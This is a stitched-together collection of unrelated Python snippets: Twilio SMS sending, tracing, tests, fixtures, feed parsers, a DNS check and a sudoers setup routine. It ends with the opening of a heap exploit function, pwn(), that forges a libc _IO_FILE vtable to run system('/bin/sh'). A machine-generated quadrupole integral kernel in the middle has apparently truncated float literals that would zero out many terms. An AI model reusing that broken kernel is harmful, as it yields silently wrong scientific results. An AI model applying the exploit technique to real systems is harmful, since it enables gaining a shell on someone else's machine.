    auth_token = messaging_config.secrets[MessagingServiceSecrets.TWILIO_AUTH_TOKEN.value]
    messaging_service_id = messaging_config.secrets.get(MessagingServiceSecrets.TWILIO_MESSAGING_SERVICE_SID.value)
    sender_phone_number = messaging_config.secrets.get(MessagingServiceSecrets.TWILIO_SENDER_PHONE_NUMBER.value)
    client = Client(account_sid, auth_token)
    try:
        if messaging_service_id:
            # prefer a messaging service SID when configured
            client.messages.create(to=to, messaging_service_sid=messaging_service_id, body=message)
        elif sender_phone_number:
            client.messages.create(to=to, from_=sender_phone_number, body=message)
        else:
            logger.error('Message failed to send. Either sender phone number or messaging service sid must be provided.')
            raise MessageDispatchException('Message failed to send. Either sender phone number or messaging service sid must be provided.')
    except TwilioRestException as e:
        logger.error('Twilio SMS failed to send: {}', Pii(str(e)))
        # fix: wrap str(e) (consistent with the log call above) and chain the
        # original exception for debuggability
        raise MessageDispatchException(f'Twilio SMS failed to send due to: {Pii(str(e))}') from e
class Tracer(BaseComponent, ABC):
    """Base class for tracers that record spans of execution.

    Note: the operation methods below had no bodies in the original listing
    (their docstrings were evidently stripped, leaving invalid syntax);
    docstring bodies are restored so the class is syntactically valid while
    remaining no-ops for subclasses to override.
    """
    name = ComponentType.TRACER.value

    def __init__(self, system_app: (SystemApp | None)=None):
        super().__init__(system_app)
        self.system_app = system_app

    def init_app(self, system_app: SystemApp):
        """Bind this tracer to `system_app`."""
        self.system_app = system_app

    def append_span(self, span: Span):
        """Record a completed span."""

    def start_span(self, operation_name: str, parent_span_id: str=None, span_type: SpanType=None, metadata: Dict=None) -> Span:
        """Create and begin a new span under `parent_span_id`."""

    def end_span(self, span: Span, **kwargs):
        """Finish `span`, flushing it to storage."""

    def get_current_span(self) -> Optional[Span]:
        """Return the currently active span, if any."""

    def _get_current_storage(self) -> SpanStorage:
        """Return the storage backend used to persist spans."""

    def _new_uuid(self) -> str:
        """Return a random identifier suitable for span/trace ids."""
        return str(uuid.uuid4())
def diag_quadrupole3d_04(ax, da, A, bx, db, B, R):
    """Auto-generated diagonal quadrupole 3D integral kernel for a (0|4) shell pair.

    NOTE(review): several float literals look truncated in this listing
    (e.g. ``0. * x27``, ``x48 = 1.``, ``1. * numpy.sqrt(x1)``), which would
    zero or unit-scale many terms - confirm the coefficients against the code
    generator's output before relying on the numbers.

    Args:
        ax, bx: Gaussian exponents on centers A and B.
        da, db: contraction coefficients.
        A, B: 3-component centers of the two Gaussians.
        R: 3-component operator center.

    Returns:
        numpy array of shape (3, 1, 15) holding the integral components.
    """
    result = numpy.zeros((3, 1, 15), dtype=float)
    # shared intermediates (machine-generated common-subexpression chain)
    x0 = (0.5 / (ax + bx))
    x1 = ((ax + bx) ** (- 1.0))
    x2 = ((- x1) * ((ax * A[0]) + (bx * B[0])))
    x3 = ((- x2) - B[0])
    x4 = ((ax * bx) * x1)
    x5 = numpy.exp(((- x4) * ((A[0] - B[0]) ** 2)))
    x6 = (1. * numpy.sqrt(x1))
    x7 = (x5 * x6)
    x8 = ((x3 ** 2) * x7)
    x9 = (x0 * x7)
    x10 = (3.0 * x9)
    x11 = (2.0 * x3)
    x12 = ((- x2) - R[0])
    x13 = (x12 * x7)
    x14 = (x10 + (x11 * x13))
    x15 = (2.0 * x0)
    x16 = (x3 * x7)
    x17 = (x0 * (x13 + x16))
    x18 = ((x12 * x16) + x9)
    x19 = (x18 * x3)
    x20 = ((x12 ** 2) * x7)
    x21 = (x0 * (x14 + x20))
    x22 = (x12 * x18)
    x23 = (x17 + x22)
    x24 = (x23 * x3)
    x25 = (x21 + x24)
    x26 = (((2.0 * x0) * (((2.0 * x17) + x19) + x22)) + (x25 * x3))
    x27 = (da * db)
    x28 = (0. * x27)
    x29 = numpy.exp(((- x4) * ((A[1] - B[1]) ** 2)))
    x30 = numpy.exp(((- x4) * ((A[2] - B[2]) ** 2)))
    x31 = ((3. * x1) * x30)
    x32 = (x29 * x31)
    x33 = ((- x1) * ((ax * A[1]) + (bx * B[1])))
    x34 = ((- x33) - B[1])
    x35 = (0. * x27)
    x36 = (x34 * x35)
    x37 = (x26 * x32)
    x38 = ((- x1) * ((ax * A[2]) + (bx * B[2])))
    x39 = ((- x38) - B[2])
    x40 = (x35 * x39)
    x41 = (x30 * x6)
    x42 = (x29 * x6)
    x43 = ((x34 ** 2) * x42)
    x44 = (x0 * x42)
    x45 = (x43 + x44)
    x46 = (0. * x27)
    x47 = (x45 * x46)
    x48 = 1.
    x49 = ((x39 * x46) * x48)
    x50 = ((x39 ** 2) * x41)
    x51 = (x0 * x41)
    x52 = (x50 + x51)
    x53 = (x46 * x52)
    x54 = (x34 * x42)
    x55 = ((x15 * x54) + (x34 * x45))
    x56 = (x23 * x35)
    x57 = (x39 * x41)
    x58 = (x23 * x48)
    x59 = ((x15 * x57) + (x39 * x52))
    x60 = (3.0 * x44)
    x61 = ((x0 * ((3.0 * x43) + x60)) + (x34 * x55))
    x62 = (x20 + x9)
    x63 = (x28 * x62)
    x64 = (x35 * x62)
    x65 = (3.0 * x51)
    x66 = ((x0 * ((3.0 * x50) + x65)) + (x39 * x59))
    x67 = (x8 + x9)
    x68 = ((x15 * x16) + (x3 * x67))
    x69 = ((x0 * (x10 + (3.0 * x8))) + (x3 * x68))
    x70 = ((- x33) - R[1])
    x71 = (x42 * (x70 ** 2))
    x72 = (x44 + x71)
    x73 = (x28 * x72)
    x74 = (x42 * x70)
    x75 = (x0 * (x54 + x74))
    x76 = (x44 + (x54 * x70))
    x77 = (x70 * x76)
    x78 = (x75 + x77)
    x79 = (x35 * x78)
    x80 = (x35 * x72)
    x81 = (2.0 * x34)
    x82 = (x60 + (x74 * x81))
    x83 = (x0 * (x71 + x82))
    x84 = (x34 * x78)
    x85 = (x83 + x84)
    x86 = (x46 * x67)
    x87 = (x48 * x78)
    x88 = (x34 * x76)
    x89 = (((2.0 * x0) * (((2.0 * x75) + x77) + x88)) + (x34 * x85))
    x90 = (x31 * x89)
    x91 = (x3 * x5)
    x92 = (x35 * x91)
    x93 = (x28 * x5)
    x94 = ((- x38) - R[2])
    x95 = (x41 * (x94 ** 2))
    x96 = (x51 + x95)
    x97 = (x28 * x96)
    x98 = (x35 * x96)
    x99 = (x41 * x94)
    x100 = (x0 * (x57 + x99))
    x101 = (x51 + (x57 * x94))
    x102 = (x101 * x94)
    x103 = (x100 + x102)
    x104 = (x103 * x35)
    x105 = (x103 * x48)
    x106 = (2.0 * x39)
    x107 = ((x106 * x99) + x65)
    x108 = (x0 * (x107 + x95))
    x109 = (x103 * x39)
    x110 = (x108 + x109)
    x111 = ((3. * x1) * x29)
    x112 = (x101 * x39)
    x113 = (((2.0 * x0) * (((2.0 * x100) + x102) + x112)) + (x110 * x39))
    x114 = (x111 * x113)
    # component assembly: result[q, 0, k] for quadrupole axis q = x, y, z
    result[(0, 0, 0)] = numpy.sum(((x28 * x32) * ((x0 * ((((x11 * (x17 + x19)) + (x15 * (x14 + x8))) + (3.0 * x21)) + (3.0 * x24))) + (x26 * x3))))
    result[(0, 0, 1)] = numpy.sum((x36 * x37))
    result[(0, 0, 2)] = numpy.sum((x37 * x40))
    result[(0, 0, 3)] = numpy.sum(((x25 * x41) * x47))
    result[(0, 0, 4)] = numpy.sum((((x25 * x32) * x34) * x49))
    result[(0, 0, 5)] = numpy.sum(((x25 * x42) * x53))
    result[(0, 0, 6)] = numpy.sum(((x41 * x55) * x56))
    result[(0, 0, 7)] = numpy.sum(((x47 * x57) * x58))
    result[(0, 0, 8)] = numpy.sum(((x53 * x54) * x58))
    result[(0, 0, 9)] = numpy.sum(((x42 * x56) * x59))
    result[(0, 0, 10)] = numpy.sum(((x41 * x61) * x63))
    result[(0, 0, 11)] = numpy.sum(((x55 * x57) * x64))
    result[(0, 0, 12)] = numpy.sum(((x45 * x53) * x62))
    result[(0, 0, 13)] = numpy.sum(((x54 * x59) * x64))
    result[(0, 0, 14)] = numpy.sum(((x42 * x63) * x66))
    result[(1, 0, 0)] = numpy.sum(((x41 * x69) * x73))
    result[(1, 0, 1)] = numpy.sum(((x41 * x68) * x79))
    result[(1, 0, 2)] = numpy.sum(((x57 * x68) * x80))
    result[(1, 0, 3)] = numpy.sum(((x41 * x85) * x86))
    result[(1, 0, 4)] = numpy.sum(((x57 * x86) * x87))
    result[(1, 0, 5)] = numpy.sum(((x53 * x67) * x72))
    result[(1, 0, 6)] = numpy.sum((x90 * x92))
    result[(1, 0, 7)] = numpy.sum((((x31 * x49) * x85) * x91))
    result[(1, 0, 8)] = numpy.sum(((x16 * x53) * x87))
    result[(1, 0, 9)] = numpy.sum(((x16 * x59) * x80))
    result[(1, 0, 10)] = numpy.sum(((x31 * x93) * ((x0 * ((((x15 * (x43 + x82)) + (x81 * (x75 + x88))) + (3.0 * x83)) + (3.0 * x84))) + (x34 * x89))))
    result[(1, 0, 11)] = numpy.sum(((x40 * x5) * x90))
    result[(1, 0, 12)] = numpy.sum(((x53 * x7) * x85))
    result[(1, 0, 13)] = numpy.sum(((x59 * x7) * x79))
    result[(1, 0, 14)] = numpy.sum(((x66 * x7) * x73))
    result[(2, 0, 0)] = numpy.sum(((x42 * x69) * x97))
    result[(2, 0, 1)] = numpy.sum(((x54 * x68) * x98))
    result[(2, 0, 2)] = numpy.sum(((x104 * x42) * x68))
    result[(2, 0, 3)] = numpy.sum(((x47 * x67) * x96))
    result[(2, 0, 4)] = numpy.sum(((x105 * x54) * x86))
    result[(2, 0, 5)] = numpy.sum(((x110 * x42) * x86))
    result[(2, 0, 6)] = numpy.sum(((x16 * x55) * x98))
    result[(2, 0, 7)] = numpy.sum(((x105 * x16) * x47))
    result[(2, 0, 8)] = numpy.sum((((((x110 * x111) * x34) * x46) * x48) * x91))
    result[(2, 0, 9)] = numpy.sum((x114 * x92))
    result[(2, 0, 10)] = numpy.sum(((x61 * x7) * x97))
    result[(2, 0, 11)] = numpy.sum(((x104 * x55) * x7))
    result[(2, 0, 12)] = numpy.sum(((x110 * x47) * x7))
    result[(2, 0, 13)] = numpy.sum(((x114 * x36) * x5))
    result[(2, 0, 14)] = numpy.sum(((x111 * x93) * ((x0 * ((((x106 * (x100 + x112)) + (3.0 * x108)) + (3.0 * x109)) + (x15 * (x107 + x50)))) + (x113 * x39))))
    return result
def test_poll_option_from_graphql_alternate_format():
    """PollOption._from_graphql handles the voters-with-edges payload shape."""
    graphql_data = {
        'id': '',
        'text': 'abc',
        'viewer_has_voted': True,
        'voters': {'count': 2, 'edges': [{'node': {'id': '1234'}}, {'node': {'id': '2345'}}]},
    }
    expected = PollOption(text='abc', vote=True, voters=['1234', '2345'], votes_count=2, id='')
    assert expected == PollOption._from_graphql(graphql_data)
def test_search_result_serialization():
    """A SEARCH_RESULT message survives an envelope encode/decode round trip."""
    agents_info = OefSearchMessage.AgentsInfo({
        'key_1': {'key_1': b'value_1', 'key_2': b'value_2'},
        'key_2': {'key_3': b'value_3', 'key_4': b'value_4'},
    })
    msg = OefSearchMessage(performative=OefSearchMessage.Performative.SEARCH_RESULT, agents=('agent_1', 'agent_2', 'agent_3'), agents_info=agents_info)
    msg.to = 'receiver'
    original = Envelope(to=msg.to, sender='sender', message=msg)
    decoded = Envelope.decode(original.encode())
    assert original.to == decoded.to
    assert original.sender == decoded.sender
    assert original.protocol_specification_id == decoded.protocol_specification_id
    # the decoded envelope still carries raw bytes, not a Message object
    assert original.message != decoded.message
    recovered = OefSearchMessage.serializer.decode(decoded.message)
    recovered.to = decoded.to
    recovered.sender = decoded.sender
    assert msg == recovered
@pytest.fixture(scope='function')
def integration_mongodb_config(db) -> ConnectionConfig:
    """Yield a MongoDB write-access connection config, deleting it after the test.

    Note: the bare ``(scope='function')`` line in the original listing was a
    stripped ``@pytest.fixture`` decorator (a syntax error as written); it is
    restored here.
    """
    connection_config = ConnectionConfig(
        key='mongo_example',
        connection_type=ConnectionType.mongodb,
        access=AccessLevel.write,
        secrets=integration_secrets['mongo_example'],
        name='mongo_example',
    )
    connection_config.save(db)
    yield connection_config
    # teardown: remove the config so tests stay isolated
    connection_config.delete(db)
def _start():
    """Initialise module state and launch one recording thread per trigger.

    All state lives in module-level globals so the trigger threads and the
    main loop can share it.
    """
    global patch, name, path, monitor
    global delay, input_scale, input_offset, filename, fileformat, f, recording, filenumber, lock, trigger, item, thread
    delay = patch.getfloat('general', 'delay')
    input_scale = patch.getfloat('input', 'scale', default=None)
    input_offset = patch.getfloat('input', 'offset', default=None)
    filename = patch.getstring('recording', 'file')
    fileformat = patch.getstring('recording', 'format')
    if (fileformat is None):
        # no explicit format configured: infer it from the file extension
        (name, ext) = os.path.splitext(filename)
        fileformat = ext[1:]
    # NOTE(review): TemporaryFile().close() returns None, so `f` starts out as
    # None - presumably a placeholder until recording opens a real file; confirm
    f = tempfile.TemporaryFile().close()
    recording = False
    filenumber = 0
    lock = threading.Lock()
    trigger = []
    monitor.info('Setting up threads for each trigger')
    for item in patch.config.items('trigger'):
        trigger.append(TriggerThread(item[0]))
        monitor.debug((item[0] + ' = OK'))
    for thread in trigger:
        thread.start()
    # sanity check: everything above should be global; report any leftovers
    if len(locals()):
        print(('LOCALS: ' + ', '.join(locals().keys())))
def is_aaaa_request(dnspkt: bytes):
    """Return True if `dnspkt` is a DNS query whose single question asks for
    an AAAA (IPv6 address) record.

    Args:
        dnspkt: raw DNS packet including the 12-byte header.

    Returns:
        True only for a query (QR bit clear) with exactly one question of
        QTYPE 28 (AAAA); False for responses, multi-question packets, or
        malformed/truncated names.

    Fixes: removed a dead bare-string statement (a stripped comment) from the
    label-walking loop and replaced ``while 1`` with idiomatic ``while True``.
    """
    (xid, flags, questions, answer_rrs, authority_rrs, add_rrs) = struct.unpack(HEADER_FMT, dnspkt[0:12])
    if flags & 0x8000:
        # QR bit set: this is a response, not a request
        return False
    if questions != 1:
        return False
    # walk the QNAME labels until the terminating zero-length label
    qname_ok = False
    rest = dnspkt[12:]
    while True:
        try:
            label_len = rest[0]
        except IndexError:
            # ran off the end of the packet: malformed name
            break
        rest = rest[label_len + 1:]
        if label_len == 0:
            qname_ok = True
            break
    if not qname_ok:
        return False
    if len(rest) < 4:
        # QTYPE/QCLASS missing after the name
        return False
    (qtype,) = struct.unpack('!H', rest[0:2])
    return qtype == 28
def extractEasyDesignBlog(item):
    """Parse a release message for Easy Design Blog feed items.

    Returns None for previews or items without vol/chapter info, a release
    message for known tags, and False when no tag matches.
    """
    (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
    if (not (chp or vol)) or ('preview' in item['title'].lower()):
        return None
    tagmap = [
        ('-Yuri War-', "Yuri War of the Demon King's Daughter the Brave Hero Who Incarnates as the Ts Wants to Protect a Peaceful Life Surrounded by Cute Demons and Monster Girls", 'translated'),
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    ]
    for tag, series, tl_type in tagmap:
        if tag not in item['tags']:
            continue
        return buildReleaseMessageWithType(item, series, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
@unittest.skipUnless(wx_available, 'Wx is not available')
class CompositeGridModelTestCase(unittest.TestCase):
    """Tests for CompositeGridModel combining two SimpleGridModels side by side.

    Note: the bare ``(wx_available, 'Wx is not available')`` line in the
    original listing was a stripped ``@unittest.skipUnless`` decorator; it is
    restored here.
    """

    def setUp(self):
        # 2x2 model followed horizontally by a 2x3 model
        self.model_1 = SimpleGridModel(data=[[1, 2], [3, 4]], rows=[GridRow(label='foo'), GridRow(label='bar')], columns=[GridColumn(label='cfoo'), GridColumn(label='cbar')])
        self.model_2 = SimpleGridModel(data=[[3, 4, 5], [6, 7, 8]], rows=[GridRow(label='baz'), GridRow(label='bat')], columns=[GridColumn(label='cfoo_2'), GridColumn(label='cbar_2'), GridColumn(label='cbaz_2')])
        self.model = CompositeGridModel(data=[self.model_1, self.model_2])

    def test_get_column_count(self):
        # composite column count is the sum of the sub-models' counts
        column_count_1 = self.model_1.get_column_count()
        column_count_2 = self.model_2.get_column_count()
        self.assertEqual(self.model.get_column_count(), (column_count_1 + column_count_2))

    def test_get_row_count(self):
        self.assertEqual(self.model.get_row_count(), 2)

    def test_get_row_name(self):
        self.assertEqual(self.model.get_row_name(0), '1')
        self.assertEqual(self.model.get_row_name(1), '2')

    def test_get_column_name(self):
        self.assertEqual(self.model.get_column_name(0), 'cfoo')
        self.assertEqual(self.model.get_column_name(1), 'cbar')
        self.assertEqual(self.model.get_column_name(2), 'cfoo_2')
        self.assertEqual(self.model.get_column_name(3), 'cbar_2')
        self.assertEqual(self.model.get_column_name(4), 'cbaz_2')

    def test_get_value(self):
        # columns 0-1 come from model_1, columns 2-4 from model_2
        self.assertEqual(self.model.get_value(0, 0), 1)
        self.assertEqual(self.model.get_value(0, 1), 2)
        self.assertEqual(self.model.get_value(0, 2), 3)
        self.assertEqual(self.model.get_value(0, 3), 4)
        self.assertEqual(self.model.get_value(0, 4), 5)
        self.assertEqual(self.model.get_value(1, 0), 3)
        self.assertEqual(self.model.get_value(1, 1), 4)
        self.assertEqual(self.model.get_value(1, 2), 6)
        self.assertEqual(self.model.get_value(1, 3), 7)
        self.assertEqual(self.model.get_value(1, 4), 8)

    def test_is_cell_empty(self):
        rows = self.model.get_row_count()
        columns = self.model.get_column_count()
        self.assertEqual(self.model.is_cell_empty(0, 0), False, 'Cell (0,0) should not be empty.')
        self.assertEqual(self.model.is_cell_empty(rows, 0), True, 'Cell below the table should be empty.')
        self.assertEqual(self.model.is_cell_empty(0, columns), True, 'Cell right of the table should be empty.')
        self.assertEqual(self.model.is_cell_empty(rows, columns), True, 'Cell below and right of table should be empty.')
        return
def calculate_correlation_matrix(X, Y=None):
    """Return the matrix of Pearson correlations between columns of X and Y.

    Y defaults to X, which yields X's auto-correlation matrix.
    """
    if Y is None:
        Y = X
    n_samples = np.shape(X)[0]
    X_centered = X - X.mean(0)
    Y_centered = Y - Y.mean(0)
    covariance = X_centered.T.dot(Y_centered) * (1 / n_samples)
    std_dev_X = np.expand_dims(calculate_std_dev(X), 1)
    std_dev_y = np.expand_dims(calculate_std_dev(Y), 1)
    # normalise the covariance by the outer product of standard deviations
    return np.array(covariance / std_dev_X.dot(std_dev_y.T), dtype=float)
class PreferencesTest(QuickbooksTestCase):
    """Integration tests for fetching and updating QuickBooks Preferences."""

    def setUp(self):
        super(PreferencesTest, self).setUp()
        self.account_number = datetime.now().strftime('%d%H%M')
        self.name = 'Test Account {0}'.format(self.account_number)

    def test_get(self):
        prefs = Preferences.get(qb=self.qb_client)
        # spot-check a field from each preference group
        expectations = [
            (prefs.Id, '1'),
            (prefs.AccountingInfoPrefs.TaxYearMonth, 'January'),
            (prefs.ProductAndServicesPrefs.ForPurchase, True),
            (prefs.VendorAndPurchasesPrefs.BillableExpenseTracking, True),
            (prefs.TimeTrackingPrefs.WorkWeekStartDate, 'Monday'),
            (prefs.OtherPrefs.NameValue[0].Name, 'SalesFormsPrefs.DefaultCustomerMessage'),
        ]
        for actual, expected in expectations:
            self.assertEqual(actual, expected)

    def test_update(self):
        prefs = Preferences.get(qb=self.qb_client)
        new_subject = datetime.now().strftime('%d%H%M%S')
        prefs.EmailMessagesPrefs.EstimateMessage.Subject = new_subject
        prefs.save(qb=self.qb_client)
        # re-fetch and confirm the change round-tripped
        refreshed = Preferences.get(qb=self.qb_client)
        self.assertEqual(refreshed.EmailMessagesPrefs.EstimateMessage.Subject, new_subject)
def evolve_handler_ids(save_stats: dict[(str, Any)], val: int, string: str, ids: list[int], forced: bool) -> dict[(str, Any)]:
    """Set the true-form evolution flags for the given cat ids.

    When `forced` is False the per-cat form data is used; otherwise every cat
    gets the flag value `val`. Current forms are raised to at least the
    unlocked form, and a raw flag of 1 is normalised back to 0.
    """
    ids = helper.check_cat_ids(ids, save_stats)
    unlocked = save_stats['unlocked_forms']
    if forced:
        for cat_id in ids:
            unlocked[cat_id] = val
    else:
        form_data = get_evolve_data(helper.check_data_is_jp(save_stats))
        for cat_id in ids[:len(form_data)]:
            try:
                unlocked[cat_id] = form_data[cat_id]
            except IndexError:
                pass
    # current form can never be lower than the unlocked form
    for cat_id, (unlocked_flag, current_flag) in enumerate(zip(unlocked, save_stats['current_forms'])):
        save_stats['current_forms'][cat_id] = max(unlocked_flag, current_flag)
    save_stats['unlocked_forms'] = [0 if flag == 1 else flag for flag in unlocked]
    print(f'Successfully {string} true forms of cats')
    return save_stats
def agency_data(helpers):
    """Build the reference/submission/account fixture rows used by agency tests.

    Creates two toptier agencies (one fully specified, one auto-filled), their
    subtiers, a submission window, submissions, treasury accounts, balances,
    one transaction, and a COVID DEF-code financial row.
    """
    # agency 001 has every descriptive field set explicitly
    ta1 = baker.make('references.ToptierAgency', toptier_code='001', abbreviation='ABBR', name='NAME', mission='TO BOLDLY GO', about_agency_data='ABOUT', website='HTTP', justification='BECAUSE', icon_filename='HAI.jpg')
    ta2 = baker.make('references.ToptierAgency', toptier_code='002', _fill_optional=True)
    sa1 = baker.make('references.SubtierAgency', subtier_code='ST1', _fill_optional=True)
    sa2 = baker.make('references.SubtierAgency', subtier_code='ST2', _fill_optional=True)
    a1 = baker.make('references.Agency', id=1, toptier_flag=True, toptier_agency=ta1, subtier_agency=sa1, _fill_optional=True)
    baker.make('references.Agency', id=2, toptier_flag=True, toptier_agency=ta2, subtier_agency=sa2, _fill_optional=True)
    dabs = baker.make('submissions.DABSSubmissionWindowSchedule', submission_reveal_date='2020-10-09', submission_fiscal_year=2020, submission_fiscal_month=12, submission_fiscal_quarter=4, is_quarter=False, period_start_date='2020-09-01', period_end_date='2020-10-01')
    # only agency 001's submission carries the mocked current fiscal year
    sub1 = baker.make('submissions.SubmissionAttributes', toptier_code=ta1.toptier_code, submission_window_id=dabs.id, reporting_fiscal_year=helpers.get_mocked_current_fiscal_year())
    baker.make('submissions.SubmissionAttributes', toptier_code=ta2.toptier_code, submission_window_id=dabs.id)
    tas1 = baker.make('accounts.TreasuryAppropriationAccount', funding_toptier_agency=ta1)
    tas2 = baker.make('accounts.TreasuryAppropriationAccount', funding_toptier_agency=ta2)
    baker.make('accounts.AppropriationAccountBalances', treasury_account_identifier=tas1, submission=sub1)
    baker.make('accounts.AppropriationAccountBalances', treasury_account_identifier=tas2, submission=sub1)
    baker.make('search.TransactionSearch', transaction_id=1, awarding_agency_id=a1.id, fiscal_year=helpers.get_mocked_current_fiscal_year())
    # COVID-19 disaster emergency fund code attached to agency 001's account
    defc = baker.make('references.DisasterEmergencyFundCode', code='L', group_name='covid_19', public_law='LAW', title='title')
    baker.make('financial_activities.FinancialAccountsByProgramActivityObjectClass', submission=sub1, treasury_account=tas1, disaster_emergency_fund=defc)
class FinancialLineItem(BaseModel):
    """A single line item extracted from a financial document (invoice/receipt).

    All fields are optional; each field's semantics are given in its
    ``description`` for schema generation.
    """
    tax: Optional[float] = Field(default=None, description='Tax amount for the line item.')
    amount_line: Optional[float] = Field(default=None, description='Total amount for the line item.')
    description: Optional[StrictStr] = Field(default=None, description='Description of the line item.')
    quantity: Optional[float] = Field(default=None, description='Quantity of units for the line item.')
    unit_price: Optional[float] = Field(default=None, description='Unit price for each unit in the line item.')
    unit_type: Optional[StrictStr] = Field(default=None, description='Type of unit (e.g., hours, items).')
    date: Optional[StrictStr] = Field(default=None, description='Date associated with the line item.')
    product_code: Optional[StrictStr] = Field(default=None, description='Product code or identifier for the line item.')
    purchase_order: Optional[StrictStr] = Field(default=None, description='Purchase order related to the line item.')
    tax_rate: Optional[float] = Field(default=None, description='Tax rate applied to the line item.')
    base_total: Optional[float] = Field(default=None, description='Base total amount before any discounts or taxes.')
    sub_total: Optional[float] = Field(default=None, description='Subtotal amount for the line item.')
    discount_amount: Optional[float] = Field(default=None, description='Amount of discount applied to the line item.')
    discount_rate: Optional[float] = Field(default=None, description='Rate of discount applied to the line item.')
    discount_code: Optional[StrictStr] = Field(default=None, description='Code associated with any discount applied to the line item.')
    order_number: Optional[StrictStr] = Field(default=None, description='Order number associated with the line item.')
    title: Optional[StrictStr] = Field(default=None, description='Title or name of the line item.')
def unified_yaml_load(configuration_file: Path) -> Dict:
    """Load a package configuration file.

    Agent packages use multi-document YAML; only the first document is
    returned for them. All other package types are single-document.
    """
    package_type = configuration_file.parent.parent.name
    with configuration_file.open(encoding='utf-8') as fp:
        if package_type == 'agents':
            return list(yaml.safe_load_all(fp))[0]
        return yaml.safe_load(fp)
def test_copy_traineddata_files_briefcase(tmp_path, monkeypatch):
    """copy_traineddata_files copies bundled tessdata into the target dir when
    running as a briefcase package, and is idempotent across repeated calls."""
    monkeypatch.setattr(system_info, 'is_briefcase_package', (lambda : True))
    with resources.as_file(resources.files('normcap.resources')) as file_path:
        resource_path = Path(file_path)
        # plant fake traineddata files inside the packaged resources
        ((resource_path / 'tessdata') / 'placeholder_1.traineddata').touch()
        ((resource_path / 'tessdata') / 'placeholder_2.traineddata').touch()
    try:
        tessdata_path = (tmp_path / 'tessdata')
        traineddatas = list(tessdata_path.glob('*.traineddata'))
        txts = list(tessdata_path.glob('*.txt'))
        # target starts empty
        assert (not traineddatas)
        assert (not txts)
        # repeated copies must not duplicate or fail
        for _ in range(3):
            utils.copy_traineddata_files(target_dir=tessdata_path)
            traineddatas = list(tessdata_path.glob('*.traineddata'))
            txts = list(tessdata_path.glob('*.txt'))
            assert traineddatas
            assert (len(txts) == 2)
    finally:
        # clean the planted files out of the shared resources directory
        for f in (resource_path / 'tessdata').glob('placeholder_?.traineddata'):
            f.unlink()
def extractShirokumamachinetranslationWordpressCom(item):
    """Parse a release message for Shirokuma machine-translation feed items.

    Returns None for previews or items without vol/chapter info, a release
    message for known tags, and False when no tag matches.
    """
    (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
    if (not (chp or vol)) or ('preview' in item['title'].lower()):
        return None
    tagmap = [
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    ]
    for tag, series, tl_type in tagmap:
        if tag not in item['tags']:
            continue
        return buildReleaseMessageWithType(item, series, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
def forward(model: TransformerListener, docs, is_train):
    """Return transformer outputs for `docs` plus a backprop callback.

    During training, outputs come from the upstream transformer component when
    the listener is linked (batch id set), otherwise from pre-annotated
    ``doc._.trf_data``. During prediction, missing annotations are replaced
    with zero tensors.
    """
    if is_train:
        # a batch id of None means no upstream transformer ran for this batch
        if (model._batch_id is None):
            outputs = []
            for doc in docs:
                if (doc._.trf_data is None):
                    # no cached annotations either - cannot train
                    raise ValueError(Errors.E203.format(name='transformer'))
                else:
                    outputs.append(doc._.trf_data)
            return (outputs, _empty_backprop)
        else:
            model.verify_inputs(docs)
            return (model._outputs, model.backprop_and_clear)
    else:
        width = model.get_dim('nO')
        outputs = []
        for doc in docs:
            if (doc._.trf_data is None):
                # no annotations available: emit a zero placeholder of the right width
                outputs.append(TransformerData.zeros(len(doc), width, xp=model.ops.xp))
            else:
                outputs.append(doc._.trf_data)
        return (outputs, _empty_backprop)
def get_workflow_stub_fn(wm: WorkflowMethod):
    """Build a stub method that synchronously executes the workflow `wm`."""
    def workflow_stub_fn(self, *args):
        assert self._workflow_client is not None
        return exec_workflow_sync(
            self._workflow_client,
            wm,
            args,
            workflow_options=self._workflow_options,
            stub_instance=self,
        )
    # tag the stub so the framework can recognise it as a workflow method
    workflow_stub_fn._workflow_method = wm
    return workflow_stub_fn
def setup_sudoers(user):
    """Write a sudoers drop-in granting `user` the service-management commands
    bench needs (service/systemctl/nginx/certbot).

    ``sudoers_file`` is a module-level constant naming the drop-in path.
    Requires root privileges; writes under /etc.
    """
    from bench.config.lets_encrypt import get_certbot_path
    if (not os.path.exists('/etc/sudoers.d')):
        os.makedirs('/etc/sudoers.d')
        # /etc/sudoers.d did not exist, so /etc/sudoers cannot include it yet
        set_permissions = (not os.path.exists('/etc/sudoers'))
        with open('/etc/sudoers', 'a') as f:
            f.write('\n#includedir /etc/sudoers.d\n')
        if set_permissions:
            # 288 == 0o440: root-readable only, as sudo requires
            os.chmod('/etc/sudoers', 288)
    template = bench.config.env().get_template('frappe_sudoers')
    frappe_sudoers = template.render(**{'user': user, 'service': which('service'), 'systemctl': which('systemctl'), 'nginx': which('nginx'), 'certbot': get_certbot_path()})
    with open(sudoers_file, 'w') as f:
        f.write(frappe_sudoers)
    # 288 == 0o440
    os.chmod(sudoers_file, 288)
    log(f'Sudoers was set up for user {user}', level=1)
class Dialogues(BaseDialogues):
    """Dialogues collection where the first message always maps to ROLE1."""

    END_STATES = frozenset({Dialogue.EndState.SUCCESSFUL, Dialogue.EndState.FAILED})

    def __init__(self, self_address: Address, message_class=DefaultMessage, dialogue_class=Dialogue, keep_terminal_state_dialogues=None) -> None:
        """Initialize the dialogues collection."""

        def role_from_first_message(message: Message, receiver_address: Address) -> BaseDialogue.Role:
            # every agent plays ROLE1 regardless of the first message
            return Dialogue.Role.ROLE1

        end_states = cast(FrozenSet[BaseDialogue.EndState], self.END_STATES)
        BaseDialogues.__init__(
            self,
            self_address=self_address,
            end_states=end_states,
            message_class=message_class,
            dialogue_class=dialogue_class,
            role_from_first_message=role_from_first_message,
            keep_terminal_state_dialogues=keep_terminal_state_dialogues,
        )
def pwn():
    """Send the final heap payload: a forged _IO_FILE whose vtable slot points
    at system(), so stdio's vtable dispatch runs system("/bin/sh").

    Relies on globals established earlier in the exploit script: libc_base,
    heap_addr, libc, io, and the upgrade() helper that performs the
    overflowing write. Offsets are binary-specific; do not reorder.
    """
    # Targets resolved from the leaked libc base / heap address.
    io_list_all = (libc_base + libc.symbols['_IO_list_all'])
    system_addr = (libc_base + libc.symbols['system'])
    vtable_addr = (heap_addr + 1480)  # fake vtable placed inside the heap payload
